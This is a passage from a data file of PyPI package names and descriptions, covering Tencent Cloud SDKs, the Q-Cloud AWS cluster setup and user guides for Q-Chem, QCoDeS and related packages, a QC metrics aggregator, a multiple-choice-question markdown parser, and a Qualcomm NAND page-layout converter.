action\u3001bucket\u3001region\u3001sourcePrefix\u7ec4\u6210\u8fd4\u56de\u503c\u8bf4\u660e\u5b57\u6bb5\u7c7b\u578b\u63cf\u8ff0policydict\u7533\u8bf7\u4e34\u65f6\u5bc6\u94a5\u6240\u9700\u7684\u6743\u9650\u7b56\u7565\u8fd4\u56de\u7ed3\u679c{\"version\":\"2.0\",\"statement\":[{\"action\":[\"name/cos:PutObject\"],\"effect\":\"allow\",\"resource\":[\"qcs::cos:ap-guangzhou:uid/1250000000:example-1250000000/1.txt\"]},{\"action\":[\"name/cos:GetObject\"],\"effect\":\"allow\",\"resource\":[\"qcs::cos:ap-guangzhou:uid/1250000000:example-1250000000/dir/exampleobject\"]}]}"} +{"package": "qcloud-python-test", "pacakge-description": "No description available on PyPI."} +{"package": "qcloud-requests-auth", "pacakge-description": "Seehttps://github.com/davendu/qcloud-requests-authfor installation and usage instructions."} +{"package": "qcloud-sdk-py", "pacakge-description": "qcloud-sdk-py\u7b80\u4ecb\u91cf\u6f6e\u79d1\u6280\u51fa\u54c1\u7684\u817e\u8baf\u4e91Python\u670d\u52a1\u7aefSDK\u3002\u5b89\u88c5pip install qcloud-sdk-py\u4f7f\u7528\u5047\u8bbe\u5728\u73af\u5883\u53d8\u91cf\u4e2d\u914d\u7f6eQCLOUDSDK_SECRET_ID\u548cQCLOUDSDK_SECRET_KEY\uff0c\u672a\u914d\u7f6e\u53ef\u4ee5\u901a\u8fc7APIClient\u4f20\u5165\u3002# \u5bfc\u5165\u6a21\u5757fromqcloud_sdk.apiimportQCloudAPIClient# \u521b\u5efaAPIClient\u5b9e\u4f8bclient=QCloudAPIClient()# \u901a\u7528APIclient.request_api(service='cvm',region='ap-shanghai',api='DescribeZones',api_params={})\u6587\u6863\u817e\u8baf\u4e91Python\u670d\u52a1\u7aefSDK\u6587\u6863"} +{"package": "qcloud-setup", "pacakge-description": "Q-Cloud Administrator DocumentationIntroductionQ-Cloud is a framework that allows users to easily launch elastic compute\nclusters on AWS and submit Q-Chem calculations to them. The clusters will\nautomatically expand with demand, up to the maximum size determined by\nthe type of Q-Cloud license purchased, and idle nodes will shut down to\nminimize running costs.Q-Cloud clusters are built around three separate AWS service stacks with the\nfollowing names and purposes:qcloud-users: This stack controls user access to the cluster. 
It\nlaunches a Cognito service which manages users, passwords and access tokens.qcloud-api-gateway: This stack provides the REST endpoints for submitting jobs to\nthe cluster and for accessing the results from calculations.qcloud-cluster: This is the actual compute cluster and consists of a head node\n(which can be just a t2.micro instance) running a SLURM workload manager.\nThe head node is responsible for launching the compute instances which run\nthe Q-Chem calculations. The head node runs for the lifetime of the\ncluster, but the compute nodes run on-demand and automatically terminate\nwhen there are no jobs in the queue.Note:Charges apply to many AWS services. See the Costs section for\nfurther details and information on how to minimise the running costs of the\ncluster.PrerequisitesThe cluster administrator will need to have a valid AWS account with\nAdmin\nand be able to\nlog into their account via theconsolein\norder to obtain access and secret access keys.Users of the cluster do not require AWS accounts as their access to the\ncluster is configured separately, (see the Adding users section below for\nfurther details on setting up user accounts).The Q-Cloud infrastructure requires you to have python (v3.7 or later)\ninstalled.The following steps are required to set up a Q-Cloud cluster.1) Obtain access keysThis step can be skipped if you have already configured the AWS CLI.Open up the AWSconsolein a browser. Search\nfor IAM and select the first hit. This brings up the IAM dashboard.From the left hand panel select 'Users' and then click on the name of a user\nwith administrator privileges (i.e. the AdministratorAccess permissions\npolicy has been attached). Note this administrator user is only required\nto create the qcloud_admin user with restricted permissions and is not used\nto launch any of the Q-Cloud resources.Select the 'Security credentials' tab and scroll down to the 'Access keys'\nsection and click the 'Create access key' button.Select the 'Command Line Interface CLI' option as the use case, check\nthe confirmation checkbox and click the Next button.Enter a description for the key and click 'Create access key'.Make a note of both the access key and the secret access key. You will not\nhave another opportunity to see the secret key, so if you misplace it you\nwill need to deactivate the key and generate a new one.2) Install the qcloud_setup scriptDownload the install_qcloud.sh script, add executable permissions and run it:wget https://downloads.q-chem.com/install_qcloud.sh\nchmod +x install_qcloud.sh\n./install_qcloud.shThis will create a virtual environment with the required Python packages installed.\nMake a note of the directory created for the virtual environment (this is output\nat the end of the install script). To activate the virtual environment and run\nthe qcloud_setup script, simply type.bash\ncd /path/to/qcloud_venv\nsource env/bin/activate\nqcloud_setup [options]Note the bash line is only required if bash is not your regular shell.\nTo exit the virtual environment after setting up your cluster simply, typedeactivate3) Configure clusterWithin the virtual environment, cluster configuration files can be generated with the command:qcloud_setup --configureThis takes the user through an interactive setup process which produces a\nconfiguration file with the nameqcloud-cluster.configwhich can be viewed\nbefore launching the cluster. 
Do not modify the contents of the configuration\nfile as it may cause subsequent steps in the setup to fail.By default the name of the cluster is 'qcloud', but this can be changed using\nthe--name option. This allows for multiple clusters to run\nat the same time, if required. Note that if a non-default name is specified\nthen this name must be passed using the--nameoption to subsequent commands\n(e.g.--launch) in order that they operate on the correct cluster.The options specified in the configuration process are discussed in detail below.3.1) AWS CredentialsThese should have been configured previously for the qcloud_admin user and, if\nso, are automatically detected.A new SSH key pair will be created to connect to the head node instance and the\nprivate key will be saved in the qcloud__keypair.pem file. You can\ncopy this key file to the location of your other key files (e.g. the ~/.ssh\ndirectory), if desired. Do not lose this private key as you will be unable to\nconnect to the head node without it.3.2) VPC setupThe Q-Cloud cluster runs inside a Virtual Private Cloud (VPC) and it is\nrecommended that a new VPC be created for running the Q-Cloud cluster.\nHowever, because there is a limit on the number of VPCs per AWS account, this may\nnot be possible for some users. Please select whichever of the following\noptions is best for your case:Default: This option will use your default VPC and both the head node and\ncompute clusters will be in a public subnet (not recommended).Use existing: If available. The setup script will look for a previously\nconfigured Q-Cloud VPC. This will have both public (for the head node)\nand private (compute nodes) subnets configured.Create new: This will create a new VPC with public and private subnets.The availability zone of the subnets does not matter.3.3) Compute instance typesThe costs shown are indicative only and are for running each instance. They\ndo not include storage or network costs. Note the difference between c5 and\nc5d instance types is the latter uses local NVMe-based SSD block storage which\nis physically connected to the instance and therefore faster.3.4) Maximum compute nodesThis determines the maximum number of compute instances that can run concurrently.\nIf more jobs are submitted than this value, they will be queued until the resources\nbecome available.This value should be set to the same number as the number of seats purchased as\npart of your license.3.5) Job filesThis is the space allocated for the jobs volume which is attached to the head\nnode and shared between compute instances. This volume is used for output\nfiles only and can be quite small. Output files are automatically deleted\nafter they have been copied to the S3 bucket.3.6) Scratch filesThis determines the scratch volume size per instance. As an indicative cost,\n100Gb costs around $10/month.4) Launching the clusterOnce a configuration file has been generated, the service stacks can be\nlaunched with the following:qcloud_setup --launchThe configuration file is automatically updated with values for the place holders\nas the various resources are created.Notes:Some steps in the launch process can take several minutes to complete, in\nparticular building the cluster stack. Migrating the Q-Cloud software to\nyour region can take a variable amount of time depending on network load.If you terminate the the qcloud_setup script during the creation process\nthe stack will continue to be created. 
Use the--deleteoption to\nactually delete or stop the stack creation.Interrupting the launch process may leave a temporary snapshot lying around.\nTo delete this, log into theAWS consoleand\nnavigate to EC2 \u2192 Snapshots. Any Q-Cloud snapshots can be safely deleted\nas long as you are not currently launching a cluster.Once launched, you will need to send the following information tolicense@q-chem.comto obtain your license activation key:Order numberNameUniversity / InstitutionElastic IP address (provided as output from the launch command)Once you have your activation key, you can install it as follows:qcloud_setup --activation-key XXXX-XXXX-XXXX-XXXX-XXXXThis command requires access to the SSH key generated during the configuration\nstep, which should be either in the current directory or in your home directory\nunder ~/.ssh.Adding usersBefore submitting jobs, a user will need to be added to the Cognito user pool:qcloud_setup --adduser --email Alternatively, you can add multiple users from a file:qcloud_setup --addusers where the file_name consists of a list of user names and email addresses with the\nformat:elmo elmo@gmail.com\nbigbird bigbird@gmail.com\n...A message will be sent to the user's email address with their user name and a\ntemporary password, which will need to be changed when first attempting to\nsubmit a job.Note that the number of users able to be added each day is limited to 50 due to\nemail limits in the Cognito service. If you need to add more than this you\nwill need to configure Cognito with the Simple Email Service' (SES) and add a\nvalidated administrator email.The cluster administrator will need to provide the server details to each\nuser which can be obtained by running the command:qcloud_setup --userinfo\nAwsRegion us-east-1\nCognitoUserPoolId us-east-1_KbkdtpKpW\nCognitoAppClientId 2mgcn0o8fkakboq7jnqs6bd6ee\nApiGatewayId fkkxolpuo4Cluster users will need to install and configure the command line interface (CLI):python3 -m pip install qcloud_userthis will install the qcloud command into their python environment and this can be configured\nby running the following command and entering the values from theqcloud_setup --userinfocommandqcloud --configureThe first time a user interacts with the cluster they will need to enter the temporary\npassword emailed to them before resetting their password.See the README.md file distributed with the qcloud_user module for further\ndetails on interacting with the server.Suspending a ClusterIt is possible to shut down the cluster head node and restart it at a later\ntime in order to minimise the running costs. If you plan to restart the\ncluster, make sure to keep copies of the configuration file, ssh key (.pem\nfile) and activation key.Use the--suspendoption to delete only the cluster stack. You will be prompted\nif you want to delete the stack, type 'y' to confirm.qcloud_setup --suspend\nDelete stack qcloud-cluster? [y/N] yThis terminates the head node, but leaves the API gateway and Cognito stacks\nrunning, using minimal resources. Once the cluster has been deleted, the\nresults of previous jobs can still be accessed via the API gateway as these are\narchived in an S3 bucket. 
You will, of course, be unable to submit further\njobs until the cluster has been restarted.To re-launch the cluster, issue the following command in the same directory as\nthe configuration and license files:qcloud_setup --launch \nqcloud_setup --activation-key XXXX-XXXX-XXXX-XXXX-XXXXNote:In order to restart a cluster, you must have configured the cluster to\nuse an elastic IP (EIP) address allocated to your AWS account. This EIP must be\navailable for reuse when re-launching the cluster, otherwise the Q-Chem license\nwill no longer be valid.If you need to update the EIP of your host, please contact our support team atsupport@q-chem.comfor assistance.Teminating a clusterBefore terminating a cluster, ensure there are no jobs running in the queue and\nthat you have downloaded the results of any calculations you wish to keep. The\nfollowing command will delete the cluster:qcloud_setup --deleteYou will be asked whether you want to delete each of the 3 stacks,\nand you should type 'y' for each.To clean up all the resources allocated to the cluster, be sure to release the\nelastic IP address and clean out any files created in the S3 bucket.Other optionsAdditional options for the setup script can be printed via:qcloud_setup --help\nqcloud_setup --info\nqcloud_setup --listYou can also open an ssh connection to the head node using the following:qcloud_setup --shellCostsThe costs associated with running the cluster hardware will be dominated by the\ncompute nodes used to run calculations. These costs depend on the type of node\nand the region configured during setup and can be estimated using theAWS Cost Estimator.In addition to the compute-node costs, there are overhead costs associated with\nrunning the head-node used for job submissions which will be incured even if\nthere are no running jobs. A low-cost T2 instance is used for this purpose and\nwill attract a monthly cost of around $10, depending on the ammount of job\nstorage selected at setup time.The costs associated with the head-node can be minimized by suspending the\ncluster when not in use. If this is done, there will still be a residual\ncharge for maintining the elastic IP which is required for licensing. This\ncost is approximately $3.65 per month.Note: These costs are managed by AWS and will be charged to the account used\nto launch the Q-Cloud cluster, they are separate from the Q-Cloud subscription\nfee which is charged by Q-Chem Inc.To monitor the costs associated with the cluster, the following will\ngive a summary of the costs recorded for the last 28 days:qcloud_setup --costsYou can also set notifications for when expenditure reaches 75% and 99% of\na specified budget, or when the expenditure is predicted to exceed the\nbudgeted figure:qcloud_setup --set-budget nwhere n is a integer number of USD.Note: Currently these cost settings appliy to the entire AWS account.TroubleshootingWhen launching the cluster, if you receive permission problems associated\nwith lambda functions, check to ensure that the IAM policy (QCloudIamPolicy) has been\ncreated in the same region as the cluster.When submitting jobs, a job ID should be returned. This is a random\nsequence of 12 alphanumeric characters associated with your job. If you do\nnot see a job ID, it is possible the submit function has not been updated\nwith the instance ID of the head node. 
Re-run the launch command to trigger\nthis update:qcloud_setup --launchIf you encounter any problems not covered here, please contact our support team atsupport@q-chem.comfor assistance."} +{"package": "qcloudsms", "pacakge-description": "\u817e\u8baf\u4e91SMS Python3 SDK\u4ee3\u7801\u4fee\u6539\u81ea\uff1asamhjn/qcloudsms-python3\u5b98\u65b9SDK\u4f7f\u7528\u6837\u4f8b\u3002\u9879\u76ee\u521d\u5fc3\u76ee\u6807\u662f\u521d\u59cb\u5316\u540e\u7acb\u5373\u53ef\u4ee5\u4f7f\u7528\u5c1d\u8bd5\u7528\u5f88\u7b80\u5355\u7684\u4ee3\u7801\u5b8c\u6210\u7edd\u5927\u90e8\u5206\u529f\u80fd\u3002\u5728\u539f\u6709\u9879\u76ee\u4e0a\uff0c\u4e3b\u8981\u505a\u4e86\u4ee5\u4e0b\u53d8\u66f4\uff1a\u5220\u9664\u4e86\u8bed\u97f3\u8fd9\u4e9b\u5f88\u5c11\u7528\u5230\u7684\u4e1c\u897f\uff0c\u53d8\u66f4\u4e86\u539f\u4ee3\u7801\u4e2d\u4e0d\u5408\u9002\u7684class \u547d\u540d\u4f7f\u7528python3\u7684 requests \u6765\u53d1\u9001\u8bf7\u6c42\u6dfb\u52a0\u4e86 demo \u6587\u4ef6\uff0c\u539f\u6765\u4ee3\u7801\u7684 demo \u8dd1\u4e0d\u8d77\u6765\u7528\u6cd5\u8bf7\u53c2\u8003 demo.py \u6587\u4ef6"} +{"package": "qcloudsms-py", "pacakge-description": "No description available on PyPI."} +{"package": "qcloud-tim", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qcloud-user", "pacakge-description": "Q-Cloud User DocumentationSetupBefore submitting any calculations, you will need to install and configure\nthe Q-Cloud command line interface:python3 -m pip install qcloud_user\nqcloud --configureYou will be prompted for several configuration values that can be obtained from\nyour Q-Cloud administrator. You should have received an email with an initial\npassword for your account, and you will be prompted to change this the first\ntime you attempt to submit a job.Job ControlSubmitting JobsUse the--submitoption to submit Q-Chem jobs to the cluster, e.g.:qcloud --submit job1.inp job2.inp [...]Several jobs can be submitted at the same time and they will be submitted with\nthe default queue parameters. If there are no compute nodes available, the\njobs will sit in the QUEUED state for a couple of minutes while a fresh compute\nnode is launched and configured. Once the queue has cleared, the compute nodes\nwill automatically shut down after the configure time frame (default is five minutes).Jobs will be submitted with the default queue parameters. To override the\ndefault parameters and/or specify additional parameters, add them to the first\nline of the Q-Chem input file. For example, the following limits the job to 1\nhour:--time=1:00:00\n$molecule\n0 1\nhe\n$end\n$rem\n...The number of threads can be specified by using the--ncpuflag, for example:qcloud --submit --ncpu 4 job1.inpNote that if the number of threads specified exceeds the number of cores on\nan individual compute node, the job will not run. Your QCloud administrator\nwill be able to inform you what this limit is.If the job submission is successful, a unique job identifier will be returned:[\u2713] Submitted job id gv6uqutvNmU0: heliumA local registry of these IDs is kept, so it is not essential to use them in the\ncommands below. 
However, they may be required to disambiguate multiple jobs\nsubmitted with the same input file basename.Monitoring JobsTo monitor the progress of jobs, use the--statusoption along with a string,\nwhich could be the file name, job ID or substring:qcloud --status The progress of jobs in the RUNNING state can be obtained using:qcloud --tail A job in the QUEUED or RUNNING state can be cancelled, which will remove it from the queue:qcloud --cancel Downloading ResultsOnce a job in in the ARCHIVED state, it can be downloaded from the S3 bucket onto\nthe local machine:qcloud --get The download will create a new directory with the same basename as the input file\ncontaining the output from the calculation.Jobs in the DOWNLOADED state can be cleared from the job registry on the local machine:qcloud --clear Note that this does not remove the results from the S3 bucket.\nIf you want to remove the job from the registry regardless of status, use the--removeoption.Other commandsThe following will give a full list of commands available using the CLI:qcloud --helpTroubleshootingIf you encounter additional problems not covered in this guide, please contact your\nQ-Cloud administrator or emailsupport@q-chem.comfor assistance."} +{"package": "qcloud_video", "pacakge-description": "UNKNOWN"} +{"package": "qcmapper", "pacakge-description": "No description available on PyPI."} +{"package": "qcmaskingcode", "pacakge-description": "UNKNOWN"} +{"package": "qcmd", "pacakge-description": "![CI](https://github.com/libanvl/python-qcmd/workflows/CI/badge.svg)\n[![PyPI version](https://badge.fury.io/py/qcmd.svg)](https://badge.fury.io/py/qcmd)# python-qcmd\nSynchronous concurrent executor command queueing for Python 3.8# Developing\n## Install pipx if pipenv is not installed\npython3 -m pip install pipx\npython3 -m pipx ensurepath## Install pipenv using pipx\npipx install pipenv## Init\nbash init.shMIT LicenseCopyright (c) 2020 libanvl.devPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \u201cSoftware\u201d), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:The above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.THE SOFTWARE IS PROVIDED \u201cAS IS\u201d, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE."} +{"package": "qc-metric-aggregator", "pacakge-description": "qc-metric-aggregatorParse individual metrics out of a directory of QC results for genomic data and output a report containing the desired metrics and the overall PASS/FAIL status of the sample.Installationpip install qc-metric-aggregatorUsageusage: aggregate-qc-metrics [-h]\n sample_name metrics_dir output_file threshold_file\n\npositional arguments:\n sample_name The sample name or id for which the QC metrics apply\n metrics_dir The directory to search for metric files, often a cromwell\n run directory\n output_file File path to store the finalized mertrics TSV\n threshold_file Path to the yml thresholds file to validate against\n\noptional arguments:\n -h, --help show this help message and exitExample invocation:aggregate-qc-metrics HG00096 /opt/qc/results/HG00096/WholeGenomeSingleSampleQc /opt/qc/scores/qc_results.tsv thresholds.ymlOutput formatsComing soon...Threshold fileYou will need to pass in a YAML file containing pass/fail threshold tests for the metrics you are interested in. The file format consists of a list of objects each containing the following keys:KeyValueCommentsmetric_nameName of the metric to checkThis can be anysupported metricand should be the value returned byname.operatorWhich operation to use to compare the metric value to the PASS/FAIL threshold<,<=,>,>=, and=are all supported. If you instead specifyreportthe metric will be reported in the final output, but not factored into the PASS/FAIL status.valueThe PASS/FAIL threshold to compare the metric value toThis field is optional ifreportis specified for theoperator.An example can befound hereSupported MetricsNameDescriptionOriginating ToolFREEMIXFreemixVerifyBamId2Q20_BASESTotal bases with Q20 or higherPicard CollectQualityYieldMetricsMEAN_COVERAGEHaploid CoveragePicard CollectWgsMetricsPCT_10XPercent coverage at 10xPicard CollectWgsMetricsPCT_20XPercent coverage at 20xPicard CollectWgsMetricsPCT_30XPercent coverage at 30xPicard CollectWgsMetricsPCT_CHIMERASPercent chimeras (PAIR)Picard CollectAlignmentSummaryMetricsREAD1_PF_MISMATCH_RATERead 1 base mismatch ratePicard CollectAlignmentSummaryMetricsREAD2_PF_MISMATCH_RATERead 2 base mismatch ratePicard CollectAlignmentSummaryMetricsMEDIAN_INSERT_SIZELibrary insert size medianPicard CollectInsertSizeMetricsMEDIAN_ABSOLUTE_DEVIATIONLibrary insert size madPicard CollectInsertSizeMetricsPERCENT_DUPLICATIONPercent duplicate marked readsPicard CollectDuplicateMetricsMEAN_TARGET_COVERAGEThe mean coverage of a target region.Picard CollectHsMetricsPCT_TARGET_BASES_10XThe fraction of all target bases achieving 10X or greater coveragePicard CollectHsMetricsPCT_TARGET_BASES_20XThe fraction of all target bases achieving 20X or greater coveragePicard CollectHsMetricsPCT_TARGET_BASES_30XThe fraction of all target bases achieving 30X or greater coveragePicard CollectHsMetricsAdding Additional MetricsTo add support for additional metrics you simply need to subclassMetricand register it inAvailableMetricsBecause many QC metrics are output in TSV format, there is a helper classTSVMetricthat you can inherent from in addition toMetricthat will make that easier. 
All of the currently supported metrics use this helper, so you should be able to look to them for examples."} +{"package": "qcm-parser", "pacakge-description": "QCM parserIt's a basic and quite strict QCM (Multiple Choices Questions) parser.It parses a file .md file into Python objects.\nThat's all.There's no rendering, no export. It must be done separetaly.InstallationIt requires python>=3.7 andmarkdownpackage.$pipinstallqcm_parserUsageIn your script :fromqcm_parser.parserimportParseQCMqcm=ParseQCM.from_file(\"my_qcm_file.md\")print(qcm)Will display your QCM as a text.In memory, youqcmobject is represented as a tree which holds parts.Those parts holds questions, holding answers.It is then easy to navigate through it like this :print(qcm.title)\nfor part in qcm.parts:\n print(part.title)\n print(part.text)\n for question in part.questions:\n print(question.title)\n print(question.text)\n for answer in question.title:\n print(answer.answer)ModesThere's 2 modes :for web export (qcm_part.from_file(filename, mode=\"web\")), the default one,modenamed parameter can be ommitted.for pdf export (qcm_part.from_file(filename, mode=\"pdf\")).Themode=webshould be used if you want to serve a QCM like I dohereIt replacesmarkdownsyntax withhtmlsyntax usingmarkdownmodule.Themode=pdfcan be used to create a randomized QCM in a .md file, then to export it with pandoc.QCM file descriptionFiles should be utf-8 encoded text files with .md extensions.They should respect theexampleformat :# title## partthe text of the part### question with multiple choicesoptional sub text. Can contains code, latex, whatever- [x]right answer- [ ]wrong answer a- [ ]wrong answer b### question with text allowed-[t]Known limitationsOnly a little subset of markdown is supported.A title must be foundtitle, parts and questions can't have empty string after#,##or###tag## valid part\n\n##\nwrong partCode blocks with triple backticks are supported not~~~. 
Those will creates bugs.# title## part### question```python# commentdeff():return1```is valid.but :# title## part### question```python# commentdeff():return1```**is not valid.**\n\nThe `# comment` line will be interpreted as a new title etc."} +{"package": "qcm-sdk", "pacakge-description": "No description available on PyPI."} +{"package": "qc_nester", "pacakge-description": "No description available on PyPI."} +{"package": "qcnlp", "pacakge-description": "No description available on PyPI."} +{"package": "qcnpy", "pacakge-description": "qcnpyQuantum Circuit Network"} +{"package": "qcobj", "pacakge-description": "QCOBJQCOBJ a Python package to handle quantity-aware configuration filesIn shortA Python package to help scientists and researchers to add physical quantities\nto the configuration files they use in their computer programs.\nHighlights:Parameter values are validated against user defined specifications to\nensure they are in the correct range and eventually converted to the\nrequested unit of measurement.A graphical user interface to display and modify configuration file content\nis included.More than two configuration files can be compared highlighting the\ndifferences between them.Install QCOBJQCOBJ can be installed without the graphical user interface:pip3 install git+https://bitbucket.org/bvidmar/qcobjor with the GUI:pip3 install git+https://bitbucket.org/bvidmar/qcobj[with_pyside2]orpip3 install git+https://bitbucket.org/bvidmar/qcobj[with_pyqt5]QCOBJ was published onSoftwareX, Volume 7, January\u2013June 2018, Pages 347-351.Where is the documentation?Here!Who do I talk to?Roberto VidmarNicola Creati"} +{"package": "qcode", "pacakge-description": "No description available on PyPI."} +{"package": "qcodes", "pacakge-description": "QCoDeSQCoDeS is a Python-based data acquisition framework developed by the\nCopenhagen / Delft / Sydney / Microsoft quantum computing consortium.\nWhile it has been developed to serve the needs of nanoelectronic device\nexperiments, it is not inherently limited to such experiments, and can\nbe used anywhere a system with many degrees of freedom is controllable\nby computer.\nTo learn more about QCoDeS, browse ourhomepage.To get a feeling of QCoDeS read15 minutes to QCoDeS,\nand/or browse the Jupyter notebooks indocs/examples.QCoDeS is compatible with Python 3.9+ (3.9 soon to be deprecated). It is\nprimarily intended for use from Jupyter notebooks, but can be used from\ntraditional terminal-based shells and in stand-alone scripts as well. 
The\nfeatures inqcodes.utils.magicare exclusively for Jupyter notebooks.Default branch is now mainThe default branch in QCoDeS has been renamed to main.\nIf you are working with a local clone of QCoDeS you should update it as follows:Rungit fetch originandgit checkout mainRungit symbolic-ref refs/remotes/origin/HEAD refs/remotes/origin/mainto update your HEAD reference.InstallIn general, refer toherefor installation.DocsRead ithere.\nDocumentation is updated and deployed on every successful build in main.We use sphinx for documentations, makefiles are provided both for\nWindows, and *nix, so that you can build the documentation locally.Make sure that you have the extra dependencies required to install the docspipinstall-rdocs_requirements.txtGo to the directorydocsandmakehtmlThis generate a webpage, index.html, indocs/_build/htmlwith the\nrendered html.QCoDeS LoopThe modulesqcodes.data,qcodes.plots,qcodes.actions,qcodes.loops,qcodes.measure,qcodes.extensions.slackandqcodes.utils.magicthat were part of QCoDeS until version 0.37.0.\nhave been moved into an independent package called qcodes_loop.\nPlease see it\u2019srepositoryanddocumentationfor more information.For the time being it is possible to automatically install the qcodes_loop\npackage when installing qcodes by executingpip install qcodes[loop].Code of ConductQCoDeS strictly adheres to theMicrosoft Open Source Code of ConductContributingThe QCoDeS instrument drivers developed by the members of\nthe QCoDeS community but not supported by the QCoDeS developers are contained inhttps://github.com/QCoDeS/Qcodes_contrib_driversSeeContributingfor general information about bug/issue\nreports, contributing code, style, and testing.LicenseSeeLicense."} +{"package": "qcodes-contrib-drivers", "pacakge-description": "This repository contains QCoDeS instrument drivers developed by members of the QCoDeS community.\nThese drivers are not supported by the QCoDeS developers but instead supported on a best effort basis\nby the developers of the individual drivers.Default branch is now mainThe default branch in qcodes_contrib_drivers has been remamed to main.\nIf you are working with a local clone of qcodes_contrib_drivers you should update it as follows.Rungit fetch originandgit checkout mainRungitsymbolic-refrefs/remotes/origin/HEAD refs/remotes/origin/mainto update your HEAD reference.Getting startedPrerequisitesThe drivers in this repository work with and heavily depend on QCoDeS. Start by installingQCoDeS.InstallationInstall the contrib drivers withpippip install qcodes_contrib_driversDrivers documentationThe documentations of the drivers in this repository can be readhere.ContributingThis repository is open for contribution of new drivers,\nas well as improvements to existing drivers. Each driver should\ncontain an implementation of the driver and a Jupyter notebook showing how the\ndriver should be used. In addition we strongly encourage writing tests for the drivers.\nAn introduction for writing tests with PyVISA-sim can be found in the QCoDeS documentation linked\nbelow.Drivers are expected to be added toqcodes_contrib_drivers/drivers/MakerOfInstrument/folder\nwhile examples should be added to thedocs/examplesfolder and tests placed in theqcodes_contrib_drivers/tests/MakerOfInstrumentfolder. 
Please follow naming conventions for\nconsistency.For general information about writing drivers and how to write tests refer to theQCoDeS documentation.\nEspecially the exampleshereare useful.LICENSEQCoDeS-Contrib-drivers is licensed under the MIT license except theTektronix AWG520andTektronix Keithley 2700drivers which are licensed under the GPL 2 or later License."} +{"package": "qcodes-loop", "pacakge-description": "qcodes_loopcontains modules that used to be part of QCoDeS but were deprecated and removed in the spring of 2023.\nThe last QCoDeS release supporting usage of theLoopand associated modules wasv0.37.0.The modules in question are:qcodes_loop.data,qcodes_loop.plots,qcodes_loop.actions,qcodes_loop.loops,qcodes_loop.measure,qcodes_loop.extensions.slackandqcodes_loop.utils.magicThe code in this repository is provided as-is but not actively maintained by the QCoDeS developers.\nWe are happy to merge contributed bug fixes, but no active development on this code is planned.Please reach out to the QCoDeS development team if you are interested in maintaining this code repository."} +{"package": "qcom-nandc-pagify", "pacakge-description": "AboutThe Qualcomm NAND controller takes care of writing and reading pages from\nthe actual NAND flash chip. It uses a non-standard page layout which splits\nthe data into smaller partitions and saves these as chunks with ECC, bad block\nmarkers and padding over the data+oob area of the nand pages.The qcom-nandc-pagify can help to convert a raw image (e.g. Linux, rootfs, \u2026)\ninto the page format which is used by the NAND controller. This can then be used\nwith a NAND flash programmer to initialize the NAND flash chip.Known NAND controllers which should work the same way are:qcom,ipq806x-nandqcom,ipq4019-nandqcom,ipq6018-nand (tested)qcom,ipq8074-nand (tested)qcom,sdx55-nandUsageBuildThe package is PEP517 compatible and can be built using python3-build:python3 -m buildThe generated wheel can then be installed via pip:dist/qcom_nandc_pagify-*-py3-none-any.whlBut the build is not necessary when all dependencies are already installed\non the system. Then it is possible to directly run it from the source\ndirectory:python3 -m qcom_nandc_pagifyUnittestThere are a couple of testcases intests/resources. Thein-*files\nare converted to theout-*files with various parameters. These should\nreflect common scenarios. The complete unittest can be run via:python3 -m unittestInstallationIt can be installed using pipfrom PyPI:python3 -m pip install --upgrade qcom-nandc-pagifyOr from the own built wheel (see above):python3 -m pip install --upgrade dist/qcom_nandc_pagify-*-py3-none-any.whlConverting an imageThe arguments are explained as part of the usage help output:qcom_nandc_pagify -hIt is necessary to specify an input file and the output file, plus a couple of\nflash-dependent parameters:# NAND device with 2048+128 large pages with BCH4 (e.g. for Cypress), 8x bus\nqcom-nandc-pagify --infile $INPUT --outfile $OUTPUT --pagesize 2048 --oobsize 128 --ecc bch4\n\n# NAND device with 2048+64 large pages with RS (e.g. for IPQ806x), 8x bus\nqcom-nandc-pagify --infile $INPUT --outfile $OUTPUT --pagesize 2048 --oobsize 64 --ecc rs\n\n# NAND device with 2048+64 large pages with RS_SBL (e.g. for IPQ806x, SBL partition), 8x bus\nqcom-nandc-pagify --infile $INPUT --outfile $OUTPUT --pagesize 2048 --oobsize 64 --ecc rs_sbl\n\n# NAND device with 4096+256 large pages with BCH8 (e.g. 
Cypress/Hawkeye), 8x bus\nqcom-nandc-pagify --infile $INPUT --outfile $OUTPUT --pagesize 4096 --oobsize 128 --ecc bch8Physical layoutPage LayoutThe data which should be saved in a page is split into 516 byte portions. Only\nthe last portion is smaller - 510 bytes of 2048 byte large pages and 484 bytes\nfor 4096 byte pages. But even the last portion is saved like it would have\nbeen 516 bytes long. The remaining bytes are simply filled with 0xff.Each data portion is saved with additional data as chunk in the NAND page.Usually, there are more bytes in the page then chunks. For example,\na 2048 bytes page with 128 bytes OOB will be split like this for 4-bit BCH ECC:516 bytes => 528 bytes for chunk in NAND516 bytes => 528 bytes for chunk in NAND516 bytes => 528 bytes for chunk in NAND510 bytes => 528 bytes for chunk in NANDThis would leave 64 bytes of the 2176 bytes (2048 + 128) uninitialized. But\nthe remaining bytes in the page can simply filled up with 0xff to make sure\nthat the page has the correct size in the converted image.More information about the page layout can be found in Linux\u2019sqcom_qcom_nandc.cunderqcom_nand_ooblayout_ecc()Chunk layoutA chunk is a complex structure withfirst data partbad block marker (1 byte on 8x wide bus, 2 byte on 16x wide bus)second data part (+padding)ECC datapaddingThe first data part and second data part are simply split by a BBM which is\nadded to each chunk - even when it is not used at all. The position of this\nBBM is chosen so that the BBM in the last chunk is at the beginning of the\nOOB region of the flash. This means as size for the first data part:2048 bytes page, 528 byte chunk: 4642048 bytes page, 532 byte chunk: 4524096 bytes page, 528 byte chunk: 4004096 bytes page, 532 byte chunk: 372The size of the ECC data depends on the used algorithm. Following are known4-Bit BCH, 8x bus: 7 bytes ECC4-Bit 